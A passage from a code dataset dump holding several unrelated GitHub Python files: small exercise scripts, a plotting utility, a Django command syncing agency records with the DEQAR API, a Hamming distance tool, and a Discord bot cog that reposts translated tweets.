toolbar_width))\nsys.stdout.flush()\nsys.stdout.write(\"\\b\" * (toolbar_width+1)) # return to start of line, after '['\n\nfor i in range(toolbar_width):\n time.sleep(0.1) # do real work here\n # update the bar\n sys.stdout.write(\"#\")\n sys.stdout.flush()\n\nsys.stdout.write(\"]\\n\")\n\n\nmyList = ['aaa', 'bbb', 'ccc', 'ddd', 'eee']\n\nfor i in tqdm(myList):\n time.sleep(2)\n print(i)\n","repo_name":"peterfarouk01/P1N1","sub_path":"progress_bar.py","file_name":"progress_bar.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33759099498","text":"# Configura o idioma em Português\n# -*- coding: utf-8 -*-\n\n#usando módulos do python\nimport os\nimport sys\nimport time\n\n# apagar a tela\nos.system('cls')\nprint('\\n')\n\n# variáveis e constantes\nVl = 0\nC = 0\nL = 0\nH = 0\n\n\n# cálculos\nC = float(input('Digite o comprimento: '))\nL = float(input('Digite a largura: '))\nH = float(input('Digite a altura: '))\n\n\n# cálculos\nVl = C * L * H\n\n# exibindo resultados na tela\nprint('O volume é: ', Vl )\nprint('\\n') # pula uma linha\ntime.sleep(5) # pausa de 5 segundos\nsys.exit # comando de fim do programa\n","repo_name":"RobertLeone/task-algoritmos","sub_path":"Aval01-Comprimento.py","file_name":"Aval01-Comprimento.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18553452344","text":"\"\"\"plot.py: Utility builder class for ML plots.\nUses scikit-learn code samples and framework\n\"\"\"\n__author__ = \"Mihai Matei\"\n__license__ = \"BSD\"\n__email__ = \"mihai.matei@my.fmi.unibuc.ro\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport randomcolor\nimport math\n\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import auc\n\nfrom .image import Image\n\n\nclass PlotBuilder:\n def __init__(self):\n self.__figures = []\n self._subplot_idx = None\n self._subplot_size = [1, 1]\n self._current_subplot = None\n self._next_plot = True\n\n def show(self, close=True):\n plt.show()\n if close:\n self.close()\n\n def close(self):\n for fig in self.__figures:\n plt.close(fig)\n self.__figures = []\n self._subplot_idx = None\n self._subplot_size = [1, 1]\n\n def same(self):\n self._next_plot = False\n\n return self\n\n @staticmethod\n def get_plot():\n return plt\n\n def create_subplots(self, rows, cols, fig_size=(18, 18)):\n self.__figures.append(plt.figure(figsize=fig_size))\n self._subplot_idx = 0\n self._subplot_size = [rows, cols]\n\n return self\n\n def _get_next_plot(self, **kwargs):\n if not self._next_plot:\n self._next_plot = False\n return self._current_subplot\n\n if self._subplot_idx is not None and self._subplot_idx >= (self._subplot_size[0] * self._subplot_size[1]):\n self._subplot_idx = None\n self._subplot_size = [1, 1]\n\n if self._subplot_idx is None:\n self.__figures.append(plt.figure(**kwargs))\n self._current_subplot = self.__figures[-1].add_subplot(1, 1, 1)\n return self._current_subplot\n\n self._subplot_idx += 1\n self._current_subplot = self.__figures[-1].add_subplot(*self._subplot_size, self._subplot_idx, **kwargs)\n return self._current_subplot\n\n def create_plot(self, title, x_data, *args):\n \"\"\"\n Plot a series of graphs on X axis points given by x_data\n and Y axis by tuples of (y_values, y_title) in args\n \"\"\"\n sp = self._get_next_plot()\n\n rand_color = randomcolor.RandomColor()\n limits = [[100000, -100000], [100000, -100000], [100000, -100000]]\n\n x_values, x_label = x_data\n limits[0][0] = min(limits[0][0], min(x_values))\n limits[0][1] = max(limits[0][1], max(x_values))\n\n for data in args:\n color = rand_color.generate()[0]\n if isinstance(data, list):\n i = 0\n for y_values in data:\n i += 1\n limits[1][0] = min(limits[1][0], min(y_values))\n limits[1][1] = max(limits[1][1], max(y_values))\n sp.plot(x_values, y_values, color=color, linewidth=2,\n linestyle='--' if i % 2 else '-')\n else:\n y_values, y_title = data\n limits[1][0] = min(limits[1][0], min(y_values))\n limits[1][1] = max(limits[1][1], max(y_values))\n sp.plot(x_values, y_values, label=y_title, color=color, linewidth=2, linestyle='-')\n\n sp.set_xlim(limits[0])\n sp.set_xlabel(x_label)\n sp.set_ylim(limits[1])\n sp.legend(loc='upper right')\n sp.set_title(title)\n\n return self\n\n def create_horizontal_line(self, *args, **kwargs):\n sp = self._get_next_plot()\n\n rand_color = randomcolor.RandomColor()\n y_limits = list(sp.get_ylim())\n for data in args:\n y_value, y_title = data\n y_limits[0] = min(y_limits[0], y_value)\n y_limits[1] = max(y_limits[1], y_value)\n sp.plot(sp.get_xlim(), [y_value, y_value], label=y_title, color=rand_color.generate()[0], **kwargs)\n sp.set_ylim([y_limits[0] * 0.9, y_limits[1] * 1.1])\n sp.legend(loc='upper right')\n\n return self\n\n def create_scatter_plot(self, title, axis_labels, *args):\n \"\"\"\n Plot a series of graphs of scatter points given by the\n list of tuples (x, y, data_label)\n \"\"\"\n markers = ['o', '*', '+', 'P', 'X', 'D']\n is_3d = len(axis_labels) == 3\n\n sp = self._get_next_plot(projection='3d') if is_3d else self._get_next_plot()\n\n rand_color = randomcolor.RandomColor()\n limits = [[100000, -100000], [100000, -100000], [100000, -100000]]\n marker_id = 0\n for data in args:\n data = list(data)\n values = data[:-1]\n label = data[-1]\n color = rand_color.generate()[0]\n for i, v in enumerate(values):\n limits[i][0] = min(limits[i][0], min(v))\n limits[i][1] = max(limits[i][1], max(v))\n\n sp.scatter(*values, label=label, color=color, marker=markers[marker_id % len(markers)])\n marker_id += 1\n\n if is_3d:\n x_label, y_label, z_label = axis_labels\n else:\n x_label, y_label = axis_labels\n\n sp.set_xlim(limits[0])\n sp.set_xlabel(x_label)\n sp.set_ylim(limits[1])\n sp.set_ylabel(y_label)\n if is_3d:\n sp.set_zlim(limits[2])\n sp.set_zlabel(z_label)\n sp.legend(loc='upper right')\n sp.set_title(title)\n\n return self\n\n def create_histograms(self, pd_categoricals, titles, bins='auto', fig_size=(13, 6)):\n \"\"\"\n Creates a histogram based on x_data\n \"\"\"\n fig, ax = plt.subplots(figsize=fig_size)\n self.__figures.append(fig)\n subplot_no = len(pd_categoricals)\n ax.axes.get_xaxis().set_visible(False)\n ax.axes.get_yaxis().set_visible(False)\n\n colors = {}\n for i in range(len(pd_categoricals)):\n data = pd_categoricals[i]\n if isinstance(data, pd.core.series.Series):\n data = data[data.isnull() == False].value_counts()\n else:\n data, labels = data\n class_id, data = np.unique(data, return_counts=True)\n sort_freq = np.argsort(-data)\n data = dict(zip([labels[c] for c in class_id[sort_freq]], data[sort_freq]))\n\n labels = [name for name in data.keys()]\n data = [data[name] for name in labels]\n if len(colors) != len(labels):\n colors = dict(zip(labels, randomcolor.RandomColor().generate(count=len(labels))))\n\n sp = fig.add_subplot(1, subplot_no, i + 1)\n plt.bar(labels, data, color=[colors[l] for l in labels])\n plt.xticks(labels, rotation=90)\n sp.set_title(titles[i])\n plt.tight_layout()\n\n return self\n\n def create_images(self, images, titles, **kwargs):\n \"\"\"\n Creates a grid of images\n \"\"\"\n subplot_cols = min(len(images), 6)\n subplot_rows = math.ceil(len(images) / subplot_cols)\n fig_size = kwargs.pop('figsize', 3)\n dpi = kwargs.pop('dpi', 80)\n\n fig = plt.figure(figsize=(subplot_cols * fig_size, subplot_rows * fig_size), dpi=dpi)\n self.__figures.append(fig)\n\n if len(images) != len(titles):\n raise(Exception(\"Image and title list must be the same\"))\n\n for i in range(len(images)):\n sp = fig.add_subplot(subplot_rows, subplot_cols, i + 1)\n sp.set_title(titles[i])\n image = images[i]\n if isinstance(image, str):\n image = Image.load(image)\n plt.imshow(Image.to_image(image), **kwargs)\n sp.axes.get_xaxis().set_visible(False)\n sp.axes.get_yaxis().set_visible(False)\n sp.grid(None)\n plt.tight_layout()\n\n return self\n\n # https://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html\n def create_confusion_matrix(self, y_true, y_pred, classes, title=None,\n x_label='Predicted class', y_label='True class', normalize=False, cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n fig, ax = plt.subplots(figsize=(8, 8))\n self.__figures.append(fig)\n\n if not title:\n if normalize:\n title = 'Normalized confusion matrix'\n else:\n title = 'Confusion matrix, without normalization'\n\n # Compute confusion matrix\n cm = confusion_matrix(y_true, y_pred, labels=np.array(range(len(classes))))\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n # ax.figure.colorbar(im, ax=ax)\n # We want to show all ticks...and label them with the respective list entries\n ax.set(xticks=np.arange(cm.shape[1]),\n yticks=np.arange(cm.shape[0]),\n xticklabels=classes, yticklabels=classes,\n title=title,\n ylabel=y_label,\n xlabel=x_label)\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n\n ax.spines['bottom'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.tick_params(axis='both', which='major', pad=10)\n\n # Loop over data dimensions and create text annotations.\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i in range(cm.shape[0]):\n for j in range(cm.shape[1]):\n ax.text(j, i, format(cm[i, j], fmt),\n ha=\"center\", va=\"center\",\n color=\"green\" if i == j else \"white\" if cm[i, j] > thresh else \"black\")\n fig.tight_layout()\n\n return self\n\n # https://scikit-learn.org/stable/auto_examples/model_selection/plot_roc.html\n def create_roc_curve_multiclass(self, y_true_labels, y_predicted_scores, classes, plot_mask=False):\n \"\"\"\n Compute ROC curve and ROC area for each class\n classes contains a list of target label names in the multiclass clasification\n plot_mask can contain a list of True/False values for each of the above class to be predicted\n \"\"\"\n\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n if not plot_mask:\n plot_mask = classes != None\n\n for i in range(len(classes)):\n if plot_mask[i]:\n fpr[i], tpr[i], _ = roc_curve(y_true_labels, y_predicted_scores[:, i], pos_label=i)\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n # https://datascience.stackexchange.com/questions/15989/micro-average-vs-macro-average-performance-in-a-multiclass-classification-settin\n # Compute micro-average ROC curve and ROC area for all classes\n y_true_micro = np.array([], dtype=np.int32)\n y_scores_micro = np.array([], dtype=np.float64)\n for i in range(len(classes)):\n if plot_mask[i]:\n y_true_micro = np.append(y_true_micro, y_true_labels == i)\n y_scores_micro = np.append(y_scores_micro, y_predicted_scores[:, i])\n\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_true_micro, y_scores_micro)\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n\n self.__plot_roc_curve(fpr, tpr, roc_auc, classes)\n\n return self\n\n def __plot_roc_curve(self, fpr, tpr, roc_auc, classes):\n self.__figures.append(plt.figure(figsize=(15, 15)))\n\n rand_color = randomcolor.RandomColor()\n for i, c in enumerate(classes):\n if i in fpr:\n plt.plot(fpr[i], tpr[i], label='ROC curve [class=%s] (area = %0.2f)' % (c, roc_auc[i]),\n color=rand_color.generate()[0], linewidth=2)\n\n if 'micro' in fpr:\n plt.plot(fpr['micro'], tpr['micro'], label='ROC curve Micro Average (area = %0.2f)' % roc_auc['micro'],\n color='deeppink', linewidth=4, linestyle=':')\n if 'macro' in fpr:\n plt.plot(fpr['macro'], tpr['macro'], label='ROC curve Macro Average (area = %0.2f)' % roc_auc['macro'],\n color='darkorange', linewidth=4, linestyle=':')\n\n plt.plot([0, 1], [0, 1], color='navy', linewidth=2, linestyle='--')\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('Recall (False Positive Rate)')\n plt.ylabel('Precision (True Positive Rate)')\n plt.title('Receiver operating characteristic')\n plt.legend(loc=\"lower right\")\n","repo_name":"glypher/pokemons","sub_path":"matmih/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":12685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1056777654","text":"class Klass:\n def __init__(self, name):\n self.name = name\n self.parents = []\n self.attributes = []\n self.operations = []\n \n def add_parent(self, name):\n self.parents.append(name)\n \n def add_attribute(self, _type, name):\n self.attributes.append((name, _type))\n \n def add_operation(self, return_type, name, args):\n self.operations.append((name, args, return_type))\n \n def _name_out(self):\n return self.name\n \n def _attribute_out(self):\n ret = []\n for a in self.attributes:\n astr = a[0] + ' : ' + a[1] + '\\\\l'\n ret.append(astr)\n return \"\".join(ret)\n \n def _operation_out(self):\n ret = []\n for o in self.operations:\n ostr = o[0] + '('\n if o[1]:\n for arg in o[1].split(', '):\n arg = arg.strip()\n s = arg.split(' ')\n if len(s) == 2:\n ostr += s[1] + ' : ' + s[0]\n else:\n ostr += s[2] + ' : ' + s[0] + ' ' + s[1]\n ostr += ', '\n ostr = ostr[:-2]\n ostr += ') : ' + o[2] + '\\\\l'\n ret.append(ostr)\n return \"\".join(ret)\n \n def uml_out(self):\n return \"\"\"\\t%(name)s [\\n\\t\\tlabel = \"{%(name)s|%(attributes)s|%(operations)s}\"\\n\\t]\"\"\" % \\\n {'name': self._name_out(), 'attributes': self._attribute_out(), 'operations': self._operation_out()}\n \n def parents_out(self):\n ret = []\n for parent in self.parents:\n parent = parent.strip()\n if parent:\n pstr = '\\t' + self.name + ' -> ' + parent + '\\n'\n ret.append(pstr)\n return \"\".join(ret)\n","repo_name":"ukscone/code","sub_path":"uml/old/klass.py","file_name":"klass.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32999414086","text":"from datetime import date, datetime, timezone\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.db.models import Value\nfrom django.db.models.functions import Concat\nfrom django.utils.html import escape\n\nimport deqarclient.agency\nfrom deqarclient.api import EqarApi\nfrom deqarclient.errors import HttpError\n\nfrom agencies.models import RegisteredAgency\nfrom contacts.models import Contact, ContactOrganisation\n\nimport phonenumbers\n\nimport json\n\nclass RemoteAgency(deqarclient.agency.Agency):\n\n def __init__(self, api, pk, command):\n self.command = command\n self.name_primary = None\n self.acronym_primary = None\n self.is_changed = False\n super().__init__(api, pk)\n\n def update(self, local):\n self.update_address(local)\n self.update_contact_names(local)\n self.update_contact_emails(local)\n self.update_contact_phones(local)\n\n def update_address(self, local):\n # postal address\n local_address = '

    ' + \\\n '
    '.join([ escape(line) for line in [\n local.instance.organisation.address1,\n local.instance.organisation.address2,\n f'{local.instance.organisation.postcode} {local.instance.organisation.city}',\n ] if line ]) + \\\n '

    '\n if self.data['address'] != local_address:\n self.command.stdout.write(self.command.style.SUCCESS(f' > address: {\"; \".join(self.data[\"address\"].splitlines())} -> {\"; \".join(local_address.splitlines())}'))\n self.data['address'] = local_address\n self.is_changed = True\n # country\n local_country = self.api.Countries.get(local.instance.organisation.country.iso3)\n if self.data['country'] != local_country['id']:\n self.command.stdout.write(self.command.style.SUCCESS(f' > country: {self.api.Countries.get(self.data[\"country\"])[\"name_english\"]} -> {local_country[\"name_english\"]}'))\n self.data['country'] = local_country['id']\n self.is_changed = True\n\n def normalize_phone(self, phone):\n try:\n parsed = phonenumbers.parse(phone, 'BE')\n return phonenumbers.format_number(parsed, phonenumbers.PhoneNumberFormat.INTERNATIONAL)\n except phonenumbers.phonenumberutil.NumberParseException:\n return phone\n\n def update_contact_names(self, local):\n # contact person name(s)\n contact_person = ', '.join([ i['contact__person'] for i in local.instance.organisation.contactorganisation_set.filter(nameOnRegister=True).order_by('contact__person').values('contact__person') ]) or 'not applicable'\n if self.data['contact_person'] != contact_person:\n self.command.stdout.write(self.command.style.SUCCESS(f\" > contact: {self.data['contact_person']} -> {contact_person}\"))\n self.data['contact_person'] = contact_person\n self.is_changed = True\n\n def update_contact_emails(self, local):\n # emails\n remote_emails = { i['email']: i for i in self.data['emails'] }\n local_emails = { i['contact__email'] for i in local.instance.organisation.contactorganisation_set.filter(emailOnRegister=True).values('contact__email') if i['contact__email'] }\n for email in list(remote_emails): # list() needed b/c we cannot change the set while iterating over itself\n if email not in local_emails:\n self.command.stdout.write(self.command.style.WARNING(f\" > - {email}\"))\n del remote_emails[email]\n for email in local_emails:\n if email not in remote_emails:\n remote_emails[email] = { 'email': email }\n self.command.stdout.write(self.command.style.SUCCESS(f\" > + {email}\"))\n if self.data[\"emails\"] != list(remote_emails.values()):\n self.data[\"emails\"] = list(remote_emails.values())\n self.is_changed = True\n\n def update_contact_phones(self, local):\n # phone number(s)\n remote_phones = { self.normalize_phone(i['phone']): i for i in self.data['phone_numbers'] }\n local_phones = { i['contact__phone'] for i in local.instance.organisation.contactorganisation_set.filter(phoneOnRegister=True).values('contact__phone') if i['contact__phone'] }\n for phone in list(remote_phones):\n if phone not in local_phones:\n self.command.stdout.write(self.command.style.WARNING(f\" > - {phone}\"))\n del remote_phones[phone]\n for phone in local_phones:\n if phone not in remote_phones:\n remote_phones[phone] = { 'phone': phone }\n self.command.stdout.write(self.command.style.SUCCESS(f\" > + {phone}\"))\n if self.data[\"phone_numbers\"] != list(remote_phones.values()):\n self.data[\"phone_numbers\"] = list(remote_phones.values())\n self.is_changed = True\n\n def save_if_changed(self):\n if self.is_changed:\n self.command.stdout.write(self.command.style.SUCCESS(f' > saving remote: {self.acronym_primary}'))\n try:\n self.save(comment='synchronised by EQAR-DB')\n except:\n self.command.stdout.write(json.dumps(self.data))\n raise\n self.is_changed = False\n else:\n self.command.stdout.write(f' = remote {self.acronym_primary} unchanged')\n\n\nclass LocalObject:\n\n def __init__(self, instance, command):\n self.instance = instance\n self.command = command\n self.is_changed = False\n\n def update_property(self, prop, remote_value):\n \"\"\"\n Updates local object's attribute to value remote, if different\n \"\"\"\n if getattr(self.instance, prop) != remote_value:\n self.command.stdout.write(self.command.style.SUCCESS(f' < {prop}: {getattr(self.instance, prop)} -> {remote_value}'))\n setattr(self.instance, prop, remote_value)\n self.is_changed = True\n\n def parse_remote_date(self, remote_value):\n if remote_value:\n return date.fromisoformat(remote_value)\n else:\n return None\n\n def save_if_changed(self):\n if self.is_changed:\n self.command.stdout.write(self.command.style.SUCCESS(f' < saving local: {self.instance}'))\n self.instance.save()\n self.is_changed = False\n else:\n self.command.stdout.write(f' = local {self.instance} unchanged')\n\nclass LocalAgency(LocalObject):\n\n def update(self, remote):\n self.update_property('registered', remote.data['is_registered'])\n self.update_property('registeredSince', self.parse_remote_date(remote.data['registration_start']))\n self.update_property('validUntil', self.parse_remote_date(remote.data['registration_valid_to']))\n self.update_property('shortname', remote.acronym_primary)\n\nclass LocalOrganisation(LocalObject):\n\n def update(self, remote):\n self.update_property('acronym', remote.acronym_primary)\n self.update_property('longname', remote.name_primary)\n\n\nclass AgencySyncer:\n\n def __init__(self, api, local, command):\n self.command = command\n self.local = LocalAgency(local, command)\n self.local_organisation = LocalOrganisation(local.organisation, command)\n self.remote = RemoteAgency(api, local.deqarId, command)\n\n def sync(self):\n self.command.stdout.write(f'- Syncing {self.remote.acronym_primary} (deqar_id={self.remote.id} <-> local_pk={self.local.instance.id}):')\n if self.remote.acronym_primary != self.local.instance.shortname:\n self.command.stdout.write(self.command.style.NOTICE(f' ! acronyms mismatch: remote={self.remote.acronym_primary} != local={self.local.instance.shortname}'))\n self.local.update(self.remote)\n self.local_organisation.update(self.remote)\n self.remote.update(self.local)\n\n def commit(self):\n self.local.save_if_changed()\n self.local_organisation.save_if_changed()\n self.remote.save_if_changed()\n\n\nclass Command(BaseCommand):\n help = 'Synchronise data on registered agencies with DEQAR'\n\n def add_arguments(self, parser):\n parser.add_argument('agency_id', nargs='*', type=int,\n help = 'only synchronise selected agency IDs')\n parser.add_argument(\"-b\", \"--base\",\n help=\"Base URL to the DEQAR admin API (default: DEQAR_BASE from settings.py)\")\n parser.add_argument(\"-t\", \"--token\",\n help=\"DEQAR API token (default: DEQAR_TOKEN from settings.py)\")\n parser.add_argument('-n', '--dry-run', action='store_true',\n help = 'check differences and only tell what would be synchronised')\n\n def handle(self, *args, **options):\n\n try:\n api = EqarApi(options['base'] or settings.DEQAR_BASE, token=(options['token'] or settings.DEQAR_TOKEN), request_timeout=600)\n except:\n raise CommandError('Error connecting to DEQAR API.')\n\n agencies = RegisteredAgency.objects.exclude(deqarId__isnull=True)\n if options['agency_id']:\n agencies = agencies.filter(id__in=options['agency_id'])\n\n for agency in agencies:\n try:\n syncer = AgencySyncer(api, agency, self)\n except HttpError:\n self.stdout.write(self.style.NOTICE(f'- failed to retrieve agency id={agency.deqarId}, skipped.'))\n else:\n syncer.sync()\n if not options['dry_run']:\n syncer.commit()\n\n","repo_name":"EQAR/eqar_db","sub_path":"api/agencies/management/commands/deqarsync.py","file_name":"deqarsync.py","file_ext":"py","file_size_in_byte":9641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2783550525","text":"# Найти корни квадратного уравнения Ax² + Bx + C = 0\n# - Математикой\n# - Используя дополнительные библиотеки*\n\nimport math\n# a = 1\n# b = 2\n# c = 3\n# # d = b**2 - 4*a*c # D<0 - нет корней, D=0 - один корень, D>0 - два различных корня\n# def maph (a,b,c): # решение квадратного уравнения x1,2 = (-b +- корень из (b**2 + 4ac)) / 2a\n# x1 = (-b + math.sqrt(b**2 - 4*a*c)) / 2*a\n# x2 = (-b - math.sqrt(b**2 - 4*a*c)) / 2*a\n# return x1, x2\n# print (maph(a,b,c))\n\n# второй способ, используя дополнительные библиотеки \nprint(\"Введите коэффициенты для уравнения\")\nprint(\"ax^2 + bx + c = 0:\")\na = float(input(\"a = \"))\nb = float(input(\"b = \"))\nc = float(input(\"c = \"))\n\ndef sq_math(a,b,c):\n discr = b ** 2 - 4 * a * c\n if discr > 0:\n x1 = (-b + math.sqrt(discr)) / (2 * a)\n x2 = (-b - math.sqrt(discr)) / (2 * a)\n return x1, x2\n elif discr == 0:\n x = -b / (2 * a)\n return x, x \n else:\n return None, None \nprint (sq_math(a,b,c))\n\n","repo_name":"PrusakovAndrey/py","sub_path":"Seminar_03/03_28_task.py","file_name":"03_28_task.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33233562268","text":"import numpy as np\nfrom timeit import default_timer as timer\n\ndef hamming_distance(s1, s2):\n if len(s1) != len(s2):\n return None\n else:\n distance = 0\n for i in range(len(s1)):\n if s1[i] != s2[i]:\n distance += 1\n return distance\n\ndef triangular_inferior_format(matrix):\n triangular_matrix = []\n for i in range(len(matrix)):\n row = []\n for j in range(len(matrix)):\n if i >= j:\n row.append(matrix[i][j])\n triangular_matrix.append(row)\n return triangular_matrix\n\ndef get_sequences_from_fasta_file(file_path):\n sequences = []\n line_sequence = 1\n file = open(file_path, 'r')\n for line in file:\n if line_sequence%2 == 0:\n sequences.append(line.replace('\\n', ''))\n line_sequence += 1\n file.close()\n return sequences\n\ndef hamming_distance_matrix(sequences, triangular=True, print_matrix=False):\n num_seqs = len(sequences)\n distance_matrix = np.zeros((num_seqs, num_seqs), dtype=int)\n \n start = timer()\n for i in range(num_seqs):\n for j in range(num_seqs):\n if i != j:\n distance_matrix[i][j] = hamming_distance(sequences[i], sequences[j])\n end = timer()\n hamming_distance_matrix_time = end - start\n\n distance_matrix_triangular = triangular_inferior_format(distance_matrix.tolist())\n \n if print_matrix == True and triangular == False:\n print(distance_matrix)\n if print_matrix == True and triangular == True:\n print(distance_matrix_triangular)\n\n if triangular == True:\n return distance_matrix_triangular, hamming_distance_matrix_time\n else:\n return distance_matrix, hamming_distance_matrix_time\n \n\nif __name__ == '__main__':\n print()\n print(\"\\nSequences from array\")\n print(\"====================\")\n\n # Directly specifying arrays and getting a normal squared matrix\n sequences = [\"ACGTAGGCCT\", \"ATGTAAGACT\", \"TCGAGAGCAC\", \"TCGAAAGCAT\"]\n print(\"Hamming distance matrix for sequences (normal format):\\n\",sequences,\"\\n\")\n m, t = hamming_distance_matrix(sequences, False, True)\n print('\\n Runing time: {:.5f} seconds'.format(t))\n print()\n\n # Directly specifying arrays and getting an inferior triangular matrix as BioPython uses\n sequences = [\"ACGT\", \"AGTT\", \"ATCC\", \"GTCA\"]\n print(\"Hamming distance matrix for sequences (inf. triangular format):\\n\",sequences,\"\\n\")\n m, t = hamming_distance_matrix(sequences, True, True)\n print('\\n Runing time: {:.5f} seconds'.format(t))\n print()\n\n print(\"\\nSequences from Fasta files\")\n print(\"==========================\")\n\n # From fasta file, reads virus kmers and produces a normal squared matrix\n sequences = get_sequences_from_fasta_file('./fasta-sequences/fasta2.txt')\n print(\"Hamming distance matrix for sequences (normal format):\\n\",sequences,\"\\n\")\n m, t = hamming_distance_matrix(sequences, False, True)\n print('\\n Runing time: {:.5f} seconds'.format(t))\n print()\n\n # From fasta file, reads virus kmers and produces an inferior triangular matrix as BioPython uses\n sequences = get_sequences_from_fasta_file('./fasta-sequences/fasta2.txt')\n print(\"Hamming distance matrix for sequences (inf. triangular format):\\n\",sequences,\"\\n\")\n m, t = hamming_distance_matrix(sequences, True, True)\n print('\\n Runing time: {:.5f} seconds'.format(t))\n print()\n","repo_name":"fsigs/nmsu-cs516-bioinformatics-project","sub_path":"ps03/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29641500363","text":"from floodsystem.geo import stations_by_distance\nfrom floodsystem.geo import distance\nfrom floodsystem.stationdata import build_station_list\nimport numpy as np\n\ndef test_distance():\n d1 = distance((0, 180), (0, 0))\n d2 = np.pi * 6371\n assert np.isclose(d1, d2)\n\ndef test_distance_sorter():\n p = (52.2053, 0.1218)\n stations = build_station_list()\n sorted_stations = stations_by_distance(stations, p)\n prev_distance = 0\n for station in sorted_stations:\n assert station[1] >= prev_distance\n prev_distance = station[1]\n","repo_name":"GeorgeSHogg/Lab-Group-79-PartIA-Flood-Warning-System","sub_path":"test_1B.py","file_name":"test_1B.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27111017443","text":"import deepl\nimport tweepy\nimport logging\nimport datetime\nimport dateutil.parser\n\nimport discord\nfrom discord.ext import tasks\nfrom redbot.core import commands, Config\nfrom discord_webhook import DiscordWebhook, DiscordEmbed\n\nlogging.basicConfig(format = '[%(asctime)s] [%(levelname)s] %(name)s: %(message)s', datefmt = '%y-%m-%d %H:%M:%S')\nlog = logging.getLogger(\"red.tweetrepost\")\n\nBaseCog = getattr(commands, \"Cog\", object)\n\n\n# REMEMBER TO SET PARAMETERS BELOW USING THIS COMMAND\n# [p]set api TweetRepost tweet_user,XXXXX webhook_url,XXXXX consumer_key,XXXXX consumer_secret,XXXXX access_token,XXXXX access_token_secret,XXXXX\n\n\nclass TweetRepost(BaseCog):\n \n def __init__(self, bot):\n super().__init__()\n self.bot = bot\n \n self.config = Config.get_conf(self, identifier=4000121212000335, force_registration=True)\n default_global = {\"last_id\": 0}\n self.config.register_global(**default_global)\n \n self.look_for_new_tweets.start()\n \n \n def cog_unload(self):\n self.look_for_new_tweets.cancel()\n \n \n # Look for new tweets code\n @tasks.loop(minutes = 10)\n async def look_for_new_tweets(self):\n \n await self.bot.wait_until_ready()\n \n log.info(\"Looking for new tweets to post...\")\n try:\n api_tokens = await self.bot.get_shared_api_tokens('TweetRepost')\n except:\n return\n auth = tweepy.OAuth1UserHandler(\n api_tokens[\"consumer_key\"], \n api_tokens[\"consumer_secret\"], \n api_tokens[\"access_token\"], \n api_tokens[\"access_token_secret\"]\n )\n api = tweepy.API(auth)\n tweets = api.user_timeline(screen_name = api_tokens['tweet_user'], count = 4, trim_user = True, exclude_replies = True, include_rts = False, tweet_mode = \"extended\")\n to_post = []\n for tweet in tweets:\n # Getting tweet data\n input_data = tweet._json\n # Getting image\n try:\n if \"media\" in input_data[\"entities\"]:\n image = input_data[\"entities\"][\"media\"][0][\"media_url\"]\n else:\n image = None\n except:\n image = None\n # Extracting important data\n to_post.append({\n \"id\": int(tweet.id),\n \"text\": input_data[\"full_text\"],\n \"image\": image,\n \"timestamp\": dateutil.parser.parse(input_data[\"created_at\"]).timestamp(),\n })\n # Last posted tweet check\n last_id = await self.config.last_id()\n to_post.sort(key = lambda x: x['timestamp']) \n try:\n index = [t[\"id\"] for t in to_post].index(last_id)\n except ValueError:\n index = -1\n if index != -1:\n to_post = to_post[index+1:]\n log.info(f\"Found {str(len(to_post))} new tweet(s). Getting ready to send if needed...\")\n # Webhook Posts\n for post in to_post:\n try:\n translated_text = deepl.translate(source_language = \"EN\", target_language = \"IT\", text = post[\"text\"])\n webhook = DiscordWebhook(url = api_tokens[\"webhook_url\"], rate_limit_retry = True)\n embed = DiscordEmbed(description = translated_text, color='00ABEE')\n embed.set_image(url = post[\"image\"])\n embed.set_timestamp(post[\"timestamp\"])\n embed.set_footer(text = \"Twitter\", icon_url = \"https://media.discordapp.net/attachments/763039440200400917/1000338562631356486/20160903181541Twitter_bird_logo.png\")\n webhook.add_embed(embed)\n webhook.execute()\n await self.config.last_id.set(post[\"id\"])\n except:\n pass\n log.info(\"Waiting for 10 minutes...\")\n\n \n @look_for_new_tweets.error\n async def look_for_new_tweets_error(self, error):\n log.error(\"Error in the task. Restarting the loop...\", exc_info = True)\n return self.look_for_new_tweets.restart()\n\n \ndef setup(bot):\n 